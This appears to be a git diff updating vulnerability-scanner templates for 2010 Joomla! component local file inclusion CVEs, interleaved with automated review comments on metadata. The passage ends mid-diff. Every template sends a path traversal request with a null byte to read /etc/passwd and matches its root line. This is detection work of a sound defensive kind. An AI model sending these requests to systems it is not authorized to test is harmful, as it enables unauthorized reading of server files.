index 9c01cb7a71..210518cbc9 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml 
@@ -3,31 +3,39 @@ id: CVE-2010-1494 info: name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12113 - https://nvd.nist.gov/vuln/detail/CVE-2010-1494 - http://www.exploit-db.com/exploits/12113 + - http://www.awdwall.com/index.php/awdwall-updates-logs- + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57693 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1494 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.02305 + cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: awdsolution + product: com_awdwall + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 6c2f72646f..a8e06a82a6 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml 
@@ -16,19 +16,25 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1495 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.04503 + cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: matamko + product: com_matamko + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index b1b524abff..32a6dbac86 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -9,25 +9,33 @@ info: - https://www.exploit-db.com/exploits/12054 - https://nvd.nist.gov/vuln/detail/CVE-2010-1531 - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt + - http://redcomponent.com/redshop/redshop-changelog + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57512 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1531 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.01815 + cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: redcomponent + product: com_redshop + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index fdf2893c8a..496e8df0ed 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml 
@@ -3,7 +3,7 @@ id: CVE-2010-1532 info: name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12118 @@ -16,19 +16,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1532 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: givesight + product: com_powermail + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index ed84b05d94..3d96cbf44c 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1533 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.00706 + cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: peter_hocherl + product: com_tweetla + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 
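Review bot: The new `cpe` line identifies the product as `com_powermail:1.53` while the template name (first hunk of this file) and the description say PowerMail Pro `1.5.3`. If `1.53` is copied verbatim from the NVD CPE it is consistent with upstream, but a version-based lookup for 1.5.3 will not find it, so either add `# CPE version string follows NVD (1.53); the product ships as 1.5.3` beside it or correct the CPE if the NVD entry is the one in error. The `matchers-condition: and` / `status: 200` addition in the second hunk has the same trade-off as in the sibling templates: it can only downgrade a conclusive `root:.*:0:0:` match to a miss.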
diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 8f2a85bf0f..e528940f57 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1534 info: name: Joomla! Component Shoutbox Pro - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12067 - https://nvd.nist.gov/vuln/detail/CVE-2010-1534 - - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39213/ - - http://web.archive.org/web/20140724182459/http://secunia.com/advisories/39352/ + - http://www.exploit-db.com/exploits/12067 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57534 remediation: Upgrade to a supported version classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1534 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.02437 + cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla.batjo + product: com_shoutbox + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 62d09cfb78..9d59954d04 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml 
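Review bot: The reference `http://www.exploit-db.com/exploits/12067` added in this hunk duplicates the `https://www.exploit-db.com/exploits/12067` entry already at the top of the list; one of the two should be removed, and the archived SecurityFocus/Secunia links it replaces were at least distinct sources. The `remediation: Upgrade to a supported version` line lacks the terminating period the sibling templates use, a nit worth fixing while the block is being edited. As elsewhere in this commit, the new `status: 200` condition only narrows what the `root:.*:0:0:` regex already proves.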
@@ -12,22 +12,28 @@ info: - http://www.exploit-db.com/exploits/12151 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1535 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00706 + cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: peter_hocherl + product: com_travelbook + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 86baad8958..84b63947ce 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1540 info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. reference: - https://www.exploit-db.com/exploits/11625 @@ -15,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1540 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0045 + cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: myblog + product: com_myblog + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index be1672ce8f..bb34d34313 100644 --- a/http/cves/2010/CVE-2010-1586.yaml 
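Review bot: In the com_myblog file the template name still reads `Joomla! Component com_blog - Directory Traversal` while the description, the new CPE (`myblog:com_myblog:3.0.329`) and the request path (`option=com_myblog`) all identify the MyBlog component; the first hunk edits the severity on the line directly below, so it is a good moment to change it to `name: Joomla! Component MyBlog 3.0.329 - Local File Inclusion` (or keep the "Directory Traversal" wording if that is the repository convention). The vulnerable parameter here is `task`, not `controller` as in the neighbouring templates, which the description already states correctly, so no change is needed there. The `status: 200` condition added in the second hunk has the same false-negative cost noted on the sibling templates.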
+++ b/http/cves/2010/CVE-2010-1586.yaml @@ -9,14 +9,18 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1586 - https://yehg.net/lab/pr0js/advisories/hp_system_management_homepage_url_redirection_abuse + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58107 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2010-1586 cwe-id: CWE-20 + epss-score: 0.00841 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hp + product: system_management_homepage tags: cve,cve2010,redirect,smh,hp http: diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 37dcce1b46..9368434e9f 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml 
@@ -3,31 +3,37 @@ id: CVE-2010-1601 info: name: Joomla! Component JA Comment - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12236 - https://nvd.nist.gov/vuln/detail/CVE-2010-1601 - - http://web.archive.org/web/20140803084823/http://secunia.com/advisories/39472/ - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57848 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1601 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01299 + cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamart + product: com_jacomment + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 9aadc30546..bfb5899ba6 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml 
@@ -9,24 +9,31 @@ info: - https://www.exploit-db.com/exploits/12283 - https://nvd.nist.gov/vuln/detail/CVE-2010-1602 - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt + - http://www.vupen.com/english/advisories/2010/0932 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1602 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.03451 + cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zimbllc + product: com_zimbcomment + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 706798a21a..f845705a61 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12284 - https://nvd.nist.gov/vuln/detail/CVE-2010-1603 - - http://web.archive.org/web/20210518112730/https://www.securityfocus.com/bid/39546 - http://www.vupen.com/english/advisories/2010/0931 remediation: Upgrade to a supported version. classification: @@ -16,19 +15,25 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1603 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.03451 + cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zimbllc + product: com_zimbcore + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 
diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 34db415607..8a6311343e 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -3,31 +3,36 @@ id: CVE-2010-1607 info: name: Joomla! Component WMI 1.5.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12316 - https://nvd.nist.gov/vuln/detail/CVE-2010-1607 - - http://web.archive.org/web/20210121195713/https://www.securityfocus.com/bid/39608/ - - http://web.archive.org/web/20111227231442/http://secunia.com/advisories/39539/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58032 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1607 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01726 + cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paysyspro + product: com_wmi + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index c3fa85c4e4..2d28834831 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml 
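Review bot: The description in this hunk says the flaw lets attackers "include and execute arbitrary local files", i.e. the impact is code execution, yet the only evidence the template collects is a `root:.*:0:0:` read of /etc/passwd, and the severity is lowered to medium purely on the CVSS v2 6.8 score. That is consistent with the rest of the commit, but someone triaging a hit would benefit from `# matcher proves arbitrary file read only; the include-and-execute impact in the description is not verified` above `matchers:`. The new `status: 200` condition has the same false-negative cost as in the sibling templates.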
@@ -9,25 +9,31 @@ info: - https://www.exploit-db.com/exploits/12430 - https://nvd.nist.gov/vuln/detail/CVE-2010-1653 - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt - - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/ + - http://www.vupen.com/english/advisories/2010/1004 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1653 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.03527 + cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: htmlcoderhelper + product: com_graphics + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index d22fa195a2..035fc9455b 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml 
@@ -3,31 +3,37 @@ id: CVE-2010-1657 info: name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-1657 - https://www.exploit-db.com/exploits/12428 - http://www.vupen.com/english/advisories/2010/1006 - - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39740/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58175 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1657 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: recly + product: com_smartsite + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index eb416dd006..79960b5666 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml 
@@ -3,30 +3,37 @@ id: CVE-2010-1658 info: name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12427 - https://nvd.nist.gov/vuln/detail/CVE-2010-1658 - http://www.vupen.com/english/advisories/2010/1007 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58176 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1658 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: code-garage + product: com_noticeboard + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 04dc0747fd..fcf1555354 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml 
@@ -3,31 +3,38 @@ id: CVE-2010-1659 info: name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12426 - https://nvd.nist.gov/vuln/detail/CVE-2010-1659 - - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39739/ - http://www.exploit-db.com/exploits/12426 + - http://www.vupen.com/english/advisories/2010/1008 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58177 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1659 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01806 + cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: webkul + product: com_ultimateportfolio + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index e811f7b05c..dc6c25110d 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml 
@@ -3,31 +3,38 @@ id: CVE-2010-1714 info: name: Joomla! Component Arcade Games 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12168 - https://nvd.nist.gov/vuln/detail/CVE-2010-1714 - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt - - http://web.archive.org/web/20140723192327/http://secunia.com/advisories/39413/ + - http://www.vupen.com/english/advisories/2010/0860 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57683 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1714 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01751 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_arcadegames + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 19351cba5f..bb94c2bbae 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml 
@@ -3,30 +3,37 @@ id: CVE-2010-1715 info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12174 - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1715 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.01242 + cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: pucit.edu + product: com_onlineexam + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 6f2d0e9012..7fba0e1949 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml 
@@ -8,26 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/12291 - https://nvd.nist.gov/vuln/detail/CVE-2010-1717 - - http://web.archive.org/web/20140805095004/http://secunia.com/advisories/39526/ - http://www.vupen.com/english/advisories/2010/0924 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P - cvss-score: 6.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1717 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01733 + cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + framework: joomla\! + vendor: if_surfalert_project + product: if_surfalert + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index b23bfceafd..f1048f6958 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1718 info: name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12282 
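Review bot: The `severity` line that should agree with the new `cvss-score: 7.5` in the com_if_surfalert hunk sits above the hunk (template lines 3–7) and is not shown; please confirm it reads `severity: high`, since the metrics move from `AC:M` / 6.8 to `AC:L` / 7.5 and a leftover `medium` would now contradict the score. The new `framework: joomla\!` metadata carries the CPE escape sequence verbatim: in a plain YAML scalar the backslash is literal, so the value is `joomla\!` rather than `joomla!`. I'd write `framework: "joomla!"` or simply `framework: joomla`, matching the `joomla` tag used throughout these templates.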
@@ -15,19 +15,25 @@ info: cvss-score: 6.8 cve-id: CVE-2010-1718 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00826 + cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lispeltuut + product: com_archeryscores + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 34d3cbf00a..5eb702c332 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -3,30 +3,37 @@ id: CVE-2010-1719 info: name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12233 - https://nvd.nist.gov/vuln/detail/CVE-2010-1719 - 